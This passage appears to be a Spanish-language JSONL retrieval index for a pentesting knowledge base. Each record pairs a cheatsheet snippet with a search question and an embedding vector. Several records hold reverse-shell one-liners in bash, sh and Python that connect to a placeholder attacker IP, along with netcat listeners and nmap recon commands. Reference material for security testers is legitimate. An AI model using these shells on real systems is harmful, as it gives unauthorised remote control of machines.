vuln IP\n```", "indexar": "que programa hay para escanear puertos y ver quΓ© hosts estΓ‘n vivos?", "v": [0.14955, -0.08438, -0.1333, 0.05599, 0.09333, -0.00446, 0.14359, -0.22114, 0.04538, -0.20131, 0.02186, -0.01665, 0.02255, 0.02302, 0.09, 0.00817, 0.10351, -0.02956, 0.11252, 0.14582, -0.10868, 0.03929, -0.01787, 0.03902, -0.02038, 0.04924, 0.02959, 0.00987, -0.06482, 0.02995, 0.0266, 0.06221, 0.0312, -0.05975, 0.0894, -0.0939, -0.02259, -0.01145, 0.03029, 0.09176, 0.0513, -0.04803, 0.06203, -0.11811, -0.00969, -0.10841, -0.07556, -0.03526, 0.04216, -0.04324, -0.08349, 0.08088, -0.02904, 0.02622, 0.01164, -0.03, -0.10203, -0.05669, 0.02939, -0.03647, -0.05198, 0.17548, 0.11535, -0.08782, -0.00035, -0.00956, 0.03154, 0.03002, -0.05892, 0.02848, -0.06988, 0.01275, 0.08774, 0.08495, -0.03041, -0.015, 0.00736, 0.02618, 0.02517, 0.08558, 0.00293, -0.03415, -0.05532, 0.07938, -0.00856, 0.00084, -0.0648, 0.01254, 0.00443, -0.18332, 0.0416, 0.00484, 0.08934, 0.14667, 0.04367, -0.07105, 0.12256, 0.07643, 0.10393, 0.0622, 0.00641, -0.02775, -0.10644, 0.08388, -0.0447, 0.09897, 0.03995, -0.11794, -0.02946, 0.08303, 0.07605, 0.02772, 0.03102, -0.07437, -0.06562, 0.0514, 0.0024, -0.05267, 0.08251, -0.03436, -0.10901, -0.0429, 0.00921, 0.0111, 0.08026, 0.01654, -0.00032, 0.1005, 0.09502, 0.07943, 0.02248, -0.01375, -0.00802, -0.07023, -0.0518, -0.05775, 0.05067, -0.02995, -0.02479, 0.00294, -0.06518, 0.11129, -0.05019, -0.00609, -0.01637, -0.00458, -0.07911, -0.0483, -0.08205, 0.03978, 0.02608, 0.05581, -0.04689, 0.03457, -0.09966, 0.0026, 0.06305, -0.02271, -0.03974, 0.03543, -0.05073, -0.03028, -0.03833, -0.06166, 0.01651, -0.07081, -0.03813, -0.00987, 0.02478, 0.05551, -0.00609, 0.06365, -0.0576, -0.07697, 0.01711, -0.0093, 0.03802, -0.05809, 0.00338, -0.05421, -0.08378, 0.09901, -0.01436, -0.02393, -0.04727, -0.06645, -0.02064, 0.05137, -0.00476, 0.03965, 0.03328, 0.08225, -0.06628, 0.04597, -0.03323, 0.01077, -0.01037, -0.01935, 0.00464, -0.04233, 0.03156, 0.02541, 0.07422, -0.02058, 0.11244, 0.07022, -0.08333, 0.02222, 0.04504, 0.11907, -0.03771, -0.03383, 0.01008, 0.01263, -0.02925, 0.04767, 0.00898, 0.04119, 0.0789, 0.04397, -0.01908, 0.01315, 0.00301, 0.02803, -0.02554, -0.04684, 0.03931, 0.05325, 0.085, 0.01519, -0.02762, -0.062, -0.05764, -0.04015, -0.01144, 0.05128, 0.02706, 0.01146, 0.00859, -0.07679, 0.00427, 0.04495, -0.03825, -0.08904, 0.06825, -0.00484, -0.02088, 0.02975, 0.04506, -0.01767, -0.04397, 0.00742, -0.02554, -0.05588, 0.03756, -0.03467]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Recon de red (nmap, comun)\n\n```bash\nnmap -sn 10.0.0.0/24 # hosts vivos\nnmap -p- --min-rate 5000 IP # todos los puertos, rapido\nnmap -sV -sC -p 22,80,443 IP # version + scripts\nnmap -sU --top-ports 20 IP # UDP\nnmap --script vuln IP\n```", "indexar": "con quΓ© puedo hacer un reconocimiento rΓ‘pido de todos los puertos abiertos en una red?", "v": [0.08845, 0.14361, -0.16301, -0.04538, 0.04969, 0.00665, 0.13013, -0.01124, -0.07534, -0.14438, -0.09372, -0.03875, 0.08611, -0.06635, 0.0491, -0.02131, -0.00668, 0.13716, 0.01372, 0.02755, 0.0002, -0.10005, -0.12026, -0.05508, 0.21173, 0.0112, 0.07403, 0.0484, -0.05906, 0.08304, -0.0023, 0.05416, 0.02093, 0.02602, -0.00867, -0.03768, 0.125, 0.08198, 0.0775, 0.04479, -0.05022, 0.02501, -0.01395, -0.00734, 0.16258, -0.05252, -0.05925, -0.03413, -0.00274, -0.02857, 0.01078, -0.08856, -0.09119, -0.14518, -0.07542, 0.00367, 0.01269, 0.06144, -0.06385, -0.05942, -0.02446, 0.05224, -0.01438, -0.06598, -0.01039, -0.11117, -0.01437, 0.1121, -0.04273, 0.05827, -0.06424, -0.02771, 0.01888, 0.06249, 0.01673, 0.04269, -0.0952, 0.04701, 0.0563, 0.06941, 0.05222, 0.0535, 0.00924, -0.1225, 0.06854, -0.0602, -0.10496, -0.08787, 0.02558, -0.11001, 0.06829, -0.00085, 0.06227, 0.10974, 0.00334, 0.00966, -0.0583, 0.06154, -0.08814, 0.0496, -0.00866, 0.03789, -0.08511, 0.00653, -0.00356, -0.00222, 0.0346, -0.07602, 0.06624, -0.0127, 0.13495, -0.02011, -0.03301, -0.02805, -0.03595, 0.00334, -0.01848, -0.14884, -0.05904, 0.03933, -0.05265, -0.11264, -0.01365, -0.04947, 0.03, -0.06849, -0.02802, 0.118, 0.04312, 0.0573, -0.03913, -0.02245, -0.09452, -0.12264, -0.01355, -0.03839, -0.03691, -0.093, 0.03537, -0.07412, -0.07458, 0.04061, -0.05692, -0.05385, 0.0088, 0.02879, -0.0317, -0.06051, -0.10759, 0.00652, -0.03102, 0.03108, -0.04844, -0.04828, -0.03505, 0.0714, 0.14382, -0.0065, -0.00996, 0.05213, -0.05744, 0.0439, -0.05945, 0.00078, 0.05146, -0.01515, -0.01268, 0.04062, 0.08495, -0.00056, -0.0033, 0.11934, -0.11903, -0.06329, 0.06459, -0.04597, -0.04815, -0.06778, -0.0103, -0.04529, -0.00097, 0.05351, -0.05451, -0.06193, -0.0559, -0.10699, 0.03063, -0.09367, -0.01267, 0.09129, 0.0278, -0.01148, 0.0366, 0.02674, -0.02513, 0.01377, 0.05661, 0.0245, -0.01015, -0.03635, 0.0206, -0.04393, 0.02833, -0.0327, -0.00565, 0.0171, -0.0781, 0.09948, -0.00769, 0.10414, 0.00513, 0.02203, 0.10933, 0.02334, -0.04341, 0.04898, -0.02837, 0.06434, 0.05906, -0.00811, 0.04989, 0.03335, -0.02389, 0.05085, 0.02146, 0.01698, 0.03212, -0.03217, 0.03307, 0.04851, 0.04271, -0.01914, -0.07837, -0.06076, -0.01001, 0.03283, -0.03325, -0.01272, -0.02901, 0.0645, 0.04766, -0.01437, -0.02397, -0.01678, 0.0325, -0.03768, -0.05468, 0.02148, 0.01059, -0.05837, -0.11624, 0.05936, 0.01962, -0.02565, 0.0137, 0.00199]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Escucha\nnc -lvnp 4444\nrlwrap nc -lvnp 4444 # con historial", "indexar": "que programa hay para escuchar en un puerto especΓ­fico", "v": [-0.05484, 0.13527, -0.16986, -0.18071, -0.02062, -0.10763, 0.07473, -0.08722, -0.09008, -0.1288, -0.00525, 0.16141, 0.02739, -0.04349, -0.0496, -0.08961, 0.02883, 0.05268, 0.05563, 0.04666, -0.00854, 0.01854, -0.05035, 0.01461, -0.00403, 0.03722, 0.06829, 0.02298, -0.02871, 0.05763, 0.01837, 0.06714, 0.05891, -0.09705, 0.00038, -0.07477, 0.12658, 0.04659, 0.02244, 0.07992, 0.03295, 0.02801, -0.05061, 0.03667, 0.16883, -0.02611, 0.03272, 0.01795, 0.03187, 0.06683, 0.01461, 0.10295, 0.00139, 0.01591, 0.07536, -0.04205, -0.07309, -0.07327, -0.039, -0.08036, -0.0616, 0.00995, 0.06592, -0.12287, 0.05594, 0.03472, 0.09009, 0.09063, -0.048, 0.00546, -0.09765, -0.07046, 0.15846, 0.0619, 0.06261, -0.02445, -0.02211, 0.01318, 0.04184, -0.02179, 0.00611, -0.02737, 0.04332, 0.0253, -0.0784, 0.06824, 0.06551, 0.00586, -0.0015, -0.01913, -0.02095, 0.0259, -0.04139, 0.08946, 0.02161, 0.00092, 0.07236, 0.06689, 0.00072, 0.01174, 0.1091, -0.02472, -0.02534, 0.05262, 0.00697, 0.08483, 0.00582, -0.11033, 0.03958, 0.07376, 0.0071, -0.02154, 0.04031, -0.07013, -0.05001, -0.1215, 0.00262, -0.07753, 0.0886, 0.01736, -0.06114, 0.01721, -0.08392, 0.00268, 0.0045, -0.06992, -0.01496, 0.08448, 0.04866, 0.06352, 0.03877, -0.00932, -0.01369, -0.11496, -0.05217, -0.09206, -0.05514, -0.04059, -0.03757, 0.02919, -0.00435, 0.06352, -0.04077, 0.0387, 0.03836, -0.02161, -0.0065, -0.04889, -0.03142, 0.01547, 0.03031, 0.0348, -0.05465, -0.0275, -0.08756, -0.02195, 0.10248, -0.03961, -0.04803, 0.03754, -0.06393, 0.01757, -0.08855, -0.10032, 0.10761, -0.05755, -0.05649, 0.0771, 0.11526, -0.009, -0.07972, 0.05341, 0.0597, -0.06247, -0.10532, -0.01248, -0.05238, -0.05469, 0.05209, -0.03941, -0.1867, 0.06857, 0.01537, -0.11918, -0.04112, -0.08279, -0.04092, -0.055, -0.04233, 0.06034, -0.02475, -0.03332, -0.03731, -0.01049, 0.01735, 0.03971, -0.0267, 0.02166, -0.06489, 0.0197, -0.06661, 0.00053, 0.03998, -0.0674, 0.10077, 0.10349, -0.04805, -0.01003, 0.05307, 0.14171, 0.00436, -0.01294, -0.00974, 0.06038, -0.02314, -0.00155, -0.00935, 0.06335, 0.05721, 0.12033, -0.05078, 0.03771, 0.084, 0.07679, -0.046, -0.04194, 0.06981, 0.02027, 0.0624, 0.06235, -0.03417, 0.005, -0.0174, -0.00068, -0.02204, 0.04734, -0.05203, 0.01244, -0.06973, -0.07364, 0.03021, 0.07164, 0.01215, -0.03666, 0.01395, -0.00813, -0.03434, 0.0855, -0.00688, 0.00445, -0.06022, 0.06938, 0.02671, -0.07595, 0.08241, 0.02734]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Escucha\nnc -lvnp 4444\nrlwrap nc -lvnp 4444 # con historial", "indexar": "con que puedo montar una escucha simple", "v": [-0.01812, 0.19532, -0.30823, -0.06218, -0.21968, -0.02052, -0.06446, 0.12693, -0.11859, -0.16262, -0.03802, 0.03745, 0.13608, 0.00782, 0.07347, 0.02508, 0.04517, 0.04248, -0.01352, 0.0226, 0.02225, -0.0695, -0.05198, -0.05453, -0.0009, 0.06576, 0.07237, -0.02038, -0.10722, 0.0198, 0.05401, 0.12312, 0.02189, 0.09656, -0.01423, -0.10541, 0.01339, 0.04999, 0.03637, 0.00492, -0.07408, -0.02086, -0.01407, 0.09209, 0.00765, 0.02118, 0.02536, -0.05995, 0.01118, 0.13544, 0.07952, 0.03882, -0.09766, 0.00286, -0.04308, 0.00351, 0.10639, -0.10208, 0.07337, -0.0406, -0.04736, 0.08592, 0.0685, 0.03995, 0.07773, 0.06269, 0.00327, 0.01362, -0.05268, -0.03188, -0.05109, -0.08937, -0.01322, 0.05017, 0.00693, 0.06449, -0.04146, -0.11156, 0.052, 0.06826, 0.02192, -0.09082, 0.04201, -0.02334, -0.03177, 0.07289, 0.05693, -0.07593, -0.0234, 0.00281, -0.02122, 0.0853, 0.06645, 0.00764, 0.03522, -0.06372, 0.02451, 0.13854, -0.04581, -0.04521, -0.05175, -0.00078, 0.01655, 0.10956, 0.09314, 0.00066, 0.0721, -0.09781, 0.04225, -0.05669, -0.01411, 0.07028, -0.11642, -0.005, -0.11238, -0.14192, -0.02929, 0.05649, -0.00113, 0.03085, 0.03886, 0.06104, 0.02339, 0.0293, -0.01068, -0.06398, 0.07728, 0.07118, 0.00462, 0.02564, 0.02272, 0.02146, 0.00136, -0.06384, 0.05766, -0.0365, -0.08196, -0.05425, -0.01548, 0.01978, 0.10683, 0.04355, -0.04884, -0.07143, 0.01675, -0.03929, 0.02135, -0.08285, 0.02273, -0.02445, 0.03509, 0.12796, 0.00166, -0.02817, -0.07331, -0.03737, 0.12095, -0.01895, 0.08756, 0.0596, -0.01773, 0.0669, -0.00668, -0.03762, 0.05411, -0.06177, -0.0591, -0.03171, 0.0296, -0.06566, -0.09045, -0.00165, 0.08869, -0.05603, -0.01189, 0.00851, -0.09514, -0.00443, 0.05495, 0.01291, -0.09074, 0.00629, -0.06452, 0.00568, -0.04231, 0.00486, 0.04815, -0.02409, -0.05921, 0.00406, 0.03389, 0.00288, -0.01262, 0.04295, 0.05642, -0.01995, 0.01918, 0.02201, -0.06396, 0.01098, -0.057, -0.02454, 0.01142, -0.05634, 0.04113, -0.01367, -0.04678, 0.11129, 0.05249, 0.07031, 0.05764, -0.02693, -0.03617, -0.01807, 0.00723, -0.01363, -0.02038, -0.00178, -0.08446, 0.10775, -0.01206, 0.07063, 0.0927, 0.04583, -0.033, 0.04003, 0.00486, 0.00991, 0.07495, 0.06454, -0.03653, 0.02789, 0.00963, 0.0046, -0.013, 0.02315, -0.01644, 0.00979, -0.0608, 0.02188, 0.03588, 0.04579, 0.02992, -0.00165, -0.00857, -0.06379, -0.01708, 0.04665, -0.00172, -0.04968, -0.03126, 0.02091, 0.00039, -0.04109, 0.00859, -0.03831]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Escucha\nnc -lvnp 4444\nrlwrap nc -lvnp 4444 # con historial", "indexar": "cual es una alternativa libre a netcat", "v": [-0.14087, 0.0138, -0.01151, 0.06384, -0.10728, -0.05548, -0.07477, -0.02911, -0.16143, -0.0127, -0.0647, -0.25055, -0.05367, 0.0819, 0.05989, 0.01178, 0.02801, -0.06862, 0.1686, -0.05491, -0.10474, -0.06147, -0.04734, -0.13969, -0.04427, -0.01724, -0.00253, 0.15351, -0.03602, 0.08415, -0.01514, 0.01128, -0.03273, 0.08151, -0.00116, 0.01665, 0.20773, 0.03394, 0.1104, -0.06066, 0.01637, -0.04897, -0.09579, 0.16329, 0.02615, -0.06427, -0.12254, -0.01795, -0.00964, -0.02421, -0.02808, -0.03748, -0.02333, 0.05145, 0.06779, 0.00191, 0.15317, -0.10885, -0.05727, -0.02008, -0.0767, 0.00571, 0.03729, -0.09323, 0.02085, 0.04206, -0.03167, 0.0299, -0.06846, 0.12292, 0.12049, -0.03169, 0.05344, -0.04481, -0.18978, 0.05667, -0.0972, -0.01888, -0.00765, 0.04901, 0.05713, -0.08549, 0.02263, 0.06965, -0.03518, -0.07347, 0.07748, -0.06512, 0.01876, 0.00758, 0.05731, 0.05024, -0.02151, 0.11951, -0.02793, -0.10139, 0.04618, 0.11118, 0.00207, 0.05743, 0.02779, 0.0865, -0.12285, -0.03739, 0.01899, -0.05178, -0.05979, 0.04355, -0.10167, 0.03081, 0.01339, 0.04333, 0.04113, 0.04904, 0.02696, -0.0684, -0.02806, 0.03133, 0.03635, 0.00064, -0.01965, -0.01051, -0.05443, -0.0818, 0.02854, 0.0343, 0.09905, 0.03413, -0.07816, 0.04206, 0.06188, -0.03981, -0.06741, -0.1037, -0.09383, -0.08095, 0.09123, -0.00827, 0.03617, 0.03669, 0.00946, -0.02464, -0.03576, 0.00246, 0.02367, -0.0278, -0.0197, -0.04305, -3e-05, -0.06446, -0.08728, 0.04698, -0.00773, 0.13359, -0.04166, 0.02427, -0.07767, 0.02868, -0.04714, 0.06783, 0.08982, -0.03785, 0.01692, 0.00787, -0.05031, -0.00363, -0.02138, -0.03212, -0.07967, -0.0019, 0.0073, 0.11447, 0.05933, -0.05282, 0.03262, -0.07259, -0.01032, -0.08028, 0.02768, -0.03914, 0.03204, 0.01993, -0.07749, -0.02816, -0.00517, -0.02275, 0.02957, 0.01275, -0.01238, 0.03266, -0.07244, 0.00807, -0.11164, -0.07309, 0.02038, 0.0559, 0.02818, -0.08634, -0.0192, -0.01526, -0.0766, -0.04923, 0.01666, -0.02201, -0.03964, -0.04135, 0.01901, -0.00138, 0.02881, 0.0394, 0.03979, 0.02395, 0.08707, 0.02809, -0.06039, 0.00034, 0.0244, -0.03982, -0.00524, -0.00258, 0.0286, -0.01668, -0.00207, 0.04478, -0.0087, 0.05751, 0.01539, 0.04014, -0.07214, 0.0045, 0.01495, -0.02637, 0.02545, 0.03083, -0.02343, -0.05479, -0.00891, 0.02062, -0.01677, 0.0044, 0.03124, 0.05563, -0.04873, -0.03702, 0.00079, 0.01537, -0.08261, -0.01933, -0.03642, -0.04691, -0.03777, 0.04641, 0.02023, 0.03051, -0.00131, 0.03975]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Disparo (Linux)\nbash -i >& /dev/tcp/TU_IP/4444 0>&1\nsh -i >& /dev/tcp/TU_IP/4444 0>&1\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"TU_IP\",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn(\"/bin/bash\")'", "indexar": "cΓ³mo usar un dispositivo de reversiΓ³n en Linux?", "v": [-0.12035, 0.08749, -0.16948, -0.13699, 0.01728, -0.07162, -0.22619, -0.00917, -0.03701, 0.01378, -0.06905, -0.11587, -0.05614, -0.03672, 0.02709, -0.15508, -0.03881, -0.11117, -0.03926, -0.11694, -0.09478, 0.04366, -0.12174, 0.02035, 0.05545, 0.06513, 0.09945, -0.137, -0.03577, -0.02555, -0.09539, 0.00813, 0.05043, 0.01929, -0.17892, 0.02663, 0.00343, 0.00809, 0.05675, 0.14541, 0.08957, -0.0253, -0.01645, 0.05378, 0.00293, -0.12916, 0.03074, -0.05894, -0.03701, -0.07824, 0.02879, 0.0576, -0.06987, 0.04193, 0.00754, -0.06112, 0.18801, -0.10125, 0.10837, -0.03015, -0.13531, -0.00826, -0.07555, 0.03399, 0.05812, -0.02799, -0.11033, 0.00855, -0.1129, -0.02829, 0.00896, 0.10876, -0.03831, 0.05279, 0.05305, 0.11687, -0.11068, 0.05065, 0.08025, 0.0305, 0.0096, -0.02683, 0.00036, -0.00626, -0.07284, -0.08736, 0.12864, 0.09095, -0.01781, 0.0107, 0.02901, 0.05995, -0.01591, -0.02381, 0.05442, -0.04241, 0.023, 0.11376, 0.00401, 0.0255, 0.09572, 0.03279, -0.03538, 0.10529, -0.0398, -0.00815, 0.00313, -0.08333, 0.00954, -0.12134, -0.00841, -0.0561, -0.02256, 0.02157, -0.12411, -0.03769, -0.03007, -0.04883, -0.04887, 0.01959, 0.00431, -0.00544, 0.06531, -0.08794, 0.0622, -0.01441, -0.05705, 0.10948, 0.01232, -0.06234, 0.06484, -0.12561, 0.01742, 0.05466, -0.04454, 0.03171, 0.03536, -0.02895, -0.0292, -0.02116, 0.0907, 0.08885, -0.02005, -0.03226, 0.13126, -0.04708, 0.08936, -0.02704, -0.03152, 0.00444, -0.0061, 0.02, -0.00205, -0.0089, -0.07961, -0.02907, 0.03443, -0.07914, -0.06594, -0.02183, -0.08027, -0.02761, 0.02232, 0.02805, -0.03463, -0.0606, -0.03986, 0.02204, 0.03995, -0.00851, -0.02545, 0.06336, 0.02432, -0.02845, 0.03928, -0.08447, 0.01952, 0.01557, -0.00403, -0.02965, 0.00621, 0.06643, -0.00573, -0.07003, 0.05304, 0.02439, -0.02199, 0.0483, 0.00884, 0.03482, 0.03774, 0.10962, 0.02796, 0.00715, 0.01434, -0.00015, -0.05035, -0.01442, 0.04535, 0.03516, -0.08533, 0.01196, -0.01592, -0.0582, 0.05593, -0.01728, -0.08948, -0.00475, -0.05805, 0.03574, 0.00419, -0.00667, 0.09856, 0.01933, -0.04695, -0.02291, 0.03485, 0.02787, -0.01977, -0.01664, 0.06868, 0.01919, 0.03457, 0.00625, -0.00972, -0.03607, 0.01449, -0.00864, -0.03638, -0.01715, 0.02325, 0.02865, -0.01304, 0.01323, -0.01295, 0.02113, 0.02165, -0.01396, -0.01545, -0.0375, -0.01309, 0.09518, 0.04293, -0.06394, -0.07, -0.03944, -0.06737, 0.03603, -0.04558, -0.05602, 0.02265, 0.03724, 0.07882, -0.03831, -0.03139, 0.00529]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Disparo (Linux)\nbash -i >& /dev/tcp/TU_IP/4444 0>&1\nsh -i >& /dev/tcp/TU_IP/4444 0>&1\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"TU_IP\",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn(\"/bin/bash\")'", "indexar": "quΓ© comando sirve para establecer una conexiΓ³n TCP desde la lΓ­nea de comandos?", "v": [-0.04838, 0.10062, -0.12949, -0.11434, 0.07976, -0.20265, 0.07293, 0.05824, -0.05835, 0.06827, -0.11253, 0.01602, 0.05433, -0.07849, 0.05633, 0.08304, 0.10362, 0.01317, 0.06286, -0.11151, 0.04944, -0.02869, 0.08868, -0.04791, 0.04799, 0.04722, 0.09728, -0.13589, -0.12987, -0.08433, -0.01593, 0.01165, 0.02797, 0.0775, -0.04262, 0.0571, -0.10099, 0.08974, -0.05486, 0.2008, -0.10894, 0.00061, -0.15428, 0.06011, 0.02122, -0.08697, 0.07531, -0.01031, 0.08703, -0.02693, -0.0434, -0.00329, -0.05305, -0.02874, -0.11748, 0.01792, 0.10193, -0.00703, 0.06518, 0.03056, -0.0918, -0.18286, -0.01994, 0.0427, -0.00351, -0.00658, -0.06761, -0.18218, -0.07249, 0.03316, -0.07395, 0.05871, -0.10331, 0.02378, 0.14059, -0.01665, 0.00194, -0.02925, 0.19583, -0.0523, 0.00525, 0.03043, -0.10414, 0.03504, -0.07846, -0.06602, -0.03579, -0.01096, -0.03541, 0.00166, 0.02733, 0.03668, 0.01913, -0.00616, 0.04132, -0.00289, -0.08908, -0.02202, 0.12433, 0.0146, 0.01549, -0.01546, -0.11036, 0.16638, -0.01388, -0.00143, 0.11053, -0.01816, 0.02066, 0.05108, 0.01043, -0.08698, 0.04809, -0.01631, -0.03844, -0.10302, -0.00375, -0.05655, -0.01769, -0.04923, -0.14681, 0.03372, 0.0795, 0.08971, 0.0093, 0.01441, -0.02714, 0.0367, 0.08798, 0.0294, -0.04774, 0.04012, 0.06089, -0.09843, -0.06841, 0.112, 0.00689, -0.03628, -0.09808, -0.15115, 0.04922, 0.06201, -0.04738, 0.02251, 0.02071, -0.01687, 0.04175, -0.07897, -0.03394, 0.02691, 0.03503, 0.04446, -0.14395, 0.02019, 0.03577, 0.01748, -0.05044, -0.00493, -0.01842, 0.04364, -0.03664, -0.05226, -0.03909, 0.00347, 0.04954, -0.06882, -0.07481, 0.01158, 0.00839, -0.00726, -0.02763, 0.02781, -0.00228, -0.03754, 0.01298, -0.06478, -0.01672, -0.00464, 0.019, 0.00434, -0.03446, -0.00627, -0.05239, -0.03534, -0.00509, -0.01825, -0.01724, -0.0023, -0.00615, 0.01301, 0.01067, 0.0307, -0.03, -0.02746, -0.00566, -0.05656, 0.05089, -0.02807, -0.01284, -0.02631, -0.06202, 0.01929, 0.0271, -0.05092, 0.02896, -0.02028, -0.00296, 0.05662, 0.01636, 0.03206, 0.02373, -0.01151, 0.0757, -0.01711, -0.05603, -0.0036, 0.01235, 0.00091, -0.0326, 0.01225, 0.01028, -0.01698, -0.00457, -0.00089, 0.02597, 0.01843, -0.06701, -0.03027, 0.04648, 0.01747, 0.00683, -0.00936, 7e-05, -0.04644, 0.02164, 0.0026, -0.00532, 0.01258, -0.01685, -0.01136, -0.00579, 0.06232, -0.03583, -0.08648, 0.03439, -0.0943, -0.08539, 0.00442, -0.01143, -0.02671, -0.04759, -0.00062, 0.01485, 0.00355, -0.06237, -0.01712]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Disparo (Linux)\nbash -i >& /dev/tcp/TU_IP/4444 0>&1\nsh -i >& /dev/tcp/TU_IP/4444 0>&1\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"TU_IP\",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn(\"/bin/bash\")'", "indexar": "cual es una alternativa libre a bash para conectar con otra IP?", "v": [-0.05609, 0.075, -0.17121, -0.00608, -0.03163, -0.14972, -0.03998, -0.07843, -0.18987, 0.02429, -0.03873, -0.15374, -0.04818, 0.04672, 0.00915, 0.03303, -0.00553, 0.00251, 0.14753, -0.14672, -0.00945, 0.15044, -0.14583, -0.03569, -0.04844, 0.0049, -0.10216, 0.09352, -0.11083, -0.0785, -0.09979, -0.141, 0.03401, 0.08274, -0.05437, -0.05898, 0.10355, 0.19973, 0.10416, 0.00335, -0.01604, -0.00898, -0.05867, 0.0834, 0.08454, -0.05415, 0.02501, -0.0245, 0.0418, -0.02625, -0.17712, -0.064, -0.09861, -0.00395, -0.03615, 0.00013, 0.08829, -0.13714, -0.08802, -0.00427, -0.11447, 0.09058, -0.06127, -0.02622, 0.03904, -2e-05, -0.15202, -0.06791, -0.07603, 0.05637, 0.10426, 0.01652, -0.10274, 0.06681, 0.01354, 0.12352, -0.02962, -0.07006, 0.06405, 0.05532, 0.01471, -0.05197, 0.00354, 0.03276, -0.04429, -0.06222, 0.06534, -0.17257, 0.03225, 0.0474, 0.07288, 0.05975, -0.01856, 0.05932, 0.02746, -0.07989, 0.05201, 0.04766, -0.03595, 0.03259, 0.06544, 0.07844, -0.13952, 0.1102, 0.06055, -0.06033, 0.04706, 0.05486, -0.03609, 0.06593, -0.01854, 0.04123, 0.04761, -0.06501, -0.01073, -0.07986, -0.07086, -0.00959, -0.0222, 0.02975, -0.02242, -0.02482, -0.0112, -0.01724, -0.02216, 0.07944, 0.01408, 0.09795, -0.00139, 0.07733, 0.09543, -0.00582, 0.01179, -0.10543, -0.0795, 0.01235, 0.03772, -0.07904, -0.04792, -0.00102, 0.05225, 0.0219, 0.01389, -0.04212, 0.074, -0.07283, -0.01417, -0.06269, -0.0237, -0.00746, -0.05071, 0.05001, -0.04358, 0.08657, -0.05837, 0.04741, -0.00938, 0.01489, -0.01531, 0.06777, 0.01157, -0.04684, 0.037, 0.00302, 0.00908, 0.03271, -0.0988, -0.02903, 0.02122, 0.05882, 0.00204, 0.04849, 0.01507, -0.01768, 0.00854, -0.07586, -0.018, -0.07925, 0.0568, -0.05737, 0.01518, -0.00025, -0.0671, -0.04686, 0.02997, 0.02588, 0.02233, 0.02365, 0.02055, 0.02428, -0.01514, -0.00728, -0.06501, -0.0167, 0.0302, -0.03836, 0.00616, -0.14369, -0.01917, 0.02409, -0.06365, 0.00652, -0.00615, -0.00464, 0.0121, 0.0152, -0.04387, 0.00861, 0.01858, 0.0407, 0.03213, -0.00594, 0.09966, -0.01505, -0.08441, 0.0163, 0.01896, -0.01613, 0.03907, 0.03191, 0.01698, 0.03246, -0.01597, 0.00304, -0.01428, 0.00548, -0.01382, 0.0165, -0.02696, 0.00049, -0.0516, 0.00929, -0.01035, -0.00185, 0.00049, -0.01229, -0.03103, -0.01791, 0.00179, -0.01797, 0.03458, 0.04758, -0.02488, -0.01813, -0.01911, 0.00098, -0.10183, 0.01925, -0.03945, -0.06883, -0.02755, 0.01527, 0.01483, -0.01426, 0.00494, 0.01431]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Estabilizar la TTY tras coger la shell\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'", "indexar": "que programa me permite abrir una terminal de usuario en python", "v": [-0.00243, -0.01179, -0.11812, -0.29317, 0.06193, -0.15393, -0.0708, -0.07634, -0.08856, -0.04332, -0.00859, 0.03235, 0.06507, -0.02742, -0.09726, -0.06508, -0.05581, -0.0347, 0.20841, -0.00019, -0.05738, 0.08365, -0.09071, -0.0469, 0.08595, 0.06779, 0.03411, -0.11354, -0.03345, -0.0753, 0.05378, -0.03193, 0.11089, -0.05712, -0.02056, -0.06708, 0.125, 0.00413, 0.02774, 0.11098, -0.00699, -0.07057, -0.07638, 0.16313, 0.06774, -0.00035, 0.07607, -0.01086, -0.00072, -0.00296, 0.03669, -0.11417, -0.07439, 0.01165, 0.09896, -0.00378, 0.08451, -0.09805, 0.07452, 0.04092, -0.04274, 0.00358, 0.09917, 0.058, 0.00469, -0.04754, 0.09539, 0.04804, -0.14548, 0.17005, -0.07173, 0.04547, -0.03045, 0.08288, 0.05215, 0.04595, -0.18708, -0.0502, 0.07155, 0.07826, -0.03071, -0.04479, 0.0378, 0.03051, -0.03747, -0.1195, 0.0403, 0.11666, 0.07367, 0.00802, 0.07026, 0.08071, 0.04281, 0.09316, 0.03235, -0.06364, 0.01734, -0.01206, -0.04483, 0.02277, 0.08576, 0.02096, -0.00732, 0.08969, -0.05582, 0.01028, -0.01269, -0.06514, -0.06444, -0.0276, 0.11692, -0.07008, 0.01193, -0.05138, -0.1163, -0.05139, -0.03287, 0.02157, -0.06839, -0.02541, -0.06084, 0.0221, 